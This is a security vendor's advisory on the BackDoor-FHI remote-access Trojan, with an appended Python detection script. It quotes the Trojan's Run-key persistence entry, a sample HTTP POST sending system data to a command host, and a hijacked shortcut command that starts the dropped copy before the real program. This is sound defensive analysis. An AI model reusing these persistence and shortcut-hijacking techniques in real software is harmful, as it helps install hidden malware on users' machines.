Intel Security

BackDoor-FHI

This page shows the details and results of our analysis of the malware BackDoor-FHI.


Threat Detail

  • Malware Type: Trojan
  • Malware Sub-type: Remote Access
  • Protection Added: 2012-08-03

This is a Trojan detection. Unlike viruses, Trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include e-mail, malicious or hacked Web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

Aliases:

  • Microsoft - Backdoor:Win32/Caphaw.K
  • TrendMicro - BKDR_KATSLO.AA


Minimum Engine

5600.1067

File Length

Varies

Description Added

2012-08-03

Description Modified

2012-08-29

Malware Proliferation

Upon execution, the Trojan drops a copy of itself to the following path:
%UserProfile%\Application Data\[random]\[random].exe

BackDoor-FHI also drops copies of itself in random locations under the name thumbs.db[random character].

The following registry key is added to the system so that the Trojan executes automatically at startup:

 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"{8DF9EE17-84FF-E9C9-901F-18FC59A5DB1E}" = %UserProfile%\Application Data\[random]\[random].exe /r

The Trojan injects its own code into many random processes and tries to connect to the following malicious hosts:

  • www.g[Removed]ard.su
  • www.pro[Removed]ection.su
  • www.e[Removed]statics.cc
  • so[Removed]esytems.cc
  • www-pro[Removed]ection.su
  • esto[Removed]e-main.su

Note: The URLs listed above may change depending on the geographic location where the malicious content is executed.

The malware posts encrypted system information to the sites above, for example:

POST /ping.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: e-statistics.cc
Content-Length: 9948
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
z=P8lvsmpmwVyY7lLJAnK60TUizGDXSdB9PCBKdUVwmflUQl6nsv5IIm7uuT7o7h ...

The malware may also modify existing document shortcut (.lnk) files so that their target uses a format similar to the following:

  • /C start cmd.exe /C if exist \path\to\thumbs.dbF start \path\to\thumbs.dbF && start ""  "OriginalApp.exe"

The modified shortcut launches the dropped copy before opening the original target.
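As an added illustration that is not part of the original advisory, the following Python check flags the two persistence artefacts described above: a Run-key value named as a {GUID} whose data points to an Application Data\[random]\[random].exe with the /r switch, and a shortcut argument string that chains cmd.exe "if exist ... thumbs.db?" before the original application. It assumes the shortcut argument strings and Run-key entries have already been extracted (it does not parse the binary .lnk format); the sample inputs, directory names and file names are constructed for the example.

```python
import re

# Shortcut argument string in the format quoted in the advisory:
#   /C start cmd.exe /C if exist <drop> start <drop> && start "" "<OriginalApp>"
# where <drop> is a copy named thumbs.db plus one extra character.
LNK_HIJACK_RE = re.compile(
    r'start\s+cmd\.exe\s+/C\s+if\s+exist\s+(?P<drop>.+?thumbs\.db\S)'
    r'\s+start\s+.+?\s*&&\s*start\s+""\s*"(?P<orig>[^"]+)"',
    re.IGNORECASE,
)
# Run-key value named {GUID} whose data is ...\Application Data\<dir>\<file>.exe /r
GUID_NAME_RE = re.compile(r'^\{[0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12}\}$', re.IGNORECASE)
RUN_DATA_RE = re.compile(r'Application Data\\[^\\]+\\[^\\]+\.exe\s+/r\s*$', re.IGNORECASE)

def classify_lnk_args(args):
    """Return (dropped_copy, original_target) for a hijacked argument string, else None."""
    m = LNK_HIJACK_RE.search(args)
    return (m.group("drop"), m.group("orig")) if m else None

def is_suspicious_run_value(name, data):
    """True when both the value name and its data fit the advisory's Run-key entry."""
    return bool(GUID_NAME_RE.match(name.strip())) and bool(RUN_DATA_RE.search(data.strip()))

def scan(lnk_args, run_values):
    """Run both checks and return findings as ("lnk"|"run", artefact, detail) tuples."""
    findings = [("lnk",) + hit for hit in map(classify_lnk_args, lnk_args) if hit]
    findings += [("run", n, d) for n, d in run_values if is_suspicious_run_value(n, d)]
    return findings

# Constructed sample input (not from a real system): one hijacked shortcut, one
# benign shortcut, one Run value in the advisory's format, one benign Run value.
SAMPLE_LNK_ARGS = [
    '/C start cmd.exe /C if exist C:\\Docs\\thumbs.dbF start C:\\Docs\\thumbs.dbF && start ""  "report.exe"',
    '/C start "" "C:\\Program Files\\Viewer\\viewer.exe"',
]
SAMPLE_RUN_VALUES = [
    ("{8DF9EE17-84FF-E9C9-901F-18FC59A5DB1E}",
     r"C:\Documents and Settings\user\Application Data\qxkd\wslr.exe /r"),
    ("Updater", r"C:\Program Files\Vendor\updater.exe /background"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LNK_ARGS, SAMPLE_RUN_VALUES):
        print(finding)
```

The same two patterns can be applied to Run-key exports and to argument strings pulled from shortcuts in user document folders during triage.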

This Trojan is designed to download malicious content from websites and infect the compromised system.

Indication of infection: presence of the above-mentioned activities.

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, email spam, etc.

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purpose of hooking system startup will be successfully removed when cleaning with the recommended engine and DAT combination (or higher).